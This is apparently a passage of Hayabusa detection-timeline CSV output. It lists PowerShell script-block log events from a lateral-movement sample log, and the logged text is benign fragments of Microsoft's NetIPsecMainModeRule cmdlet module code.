(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { 
[CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 